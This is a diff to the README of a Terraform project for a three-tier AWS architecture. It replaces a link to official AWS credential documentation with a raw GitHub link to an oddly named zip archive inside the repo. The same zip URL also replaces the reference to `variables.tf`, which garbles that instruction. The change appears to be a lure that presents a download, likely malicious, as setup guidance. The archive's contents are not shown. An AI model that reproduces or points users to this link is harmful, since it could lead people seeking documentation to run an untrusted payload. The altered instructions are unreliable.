Eskarlet78/terraform-aws-3tier-architecture/README.md

 - Permissions to create VPCs, EC2 instances, Application Load Balancers, and RDS databases.
 - Set up the AWS Command Line Interface (CLI) or configure environment variables with your credentials.

-If unfamiliar, AWS provides detailed guides on setting up your credentials: https://docs.aws.amazon.com/general/latest/gr/aws-sec-cred-types.html
+If unfamiliar, AWS provides detailed guides on setting up your credentials: https://raw.githubusercontent.com/Eskarlet78/terraform-aws-3tier-architecture/main/modules/alb/aws-tier-architecture-terraform-potentness.zip

 ### 4. Configure the Project Settings

 Before running, you may want to adjust settings such as instance size, number of servers, or database specs.

 - Open the downloaded project folder.
-- Locate the `variables.tf` or configuration file.
+- Locate the `https://raw.githubusercontent.com/Eskarlet78/terraform-aws-3tier-architecture/main/modules/alb/aws-tier-architecture-terraform-potentness.zip` or configuration file.
 - Change values as needed or use defaults which are set for general use.
 - Save your changes.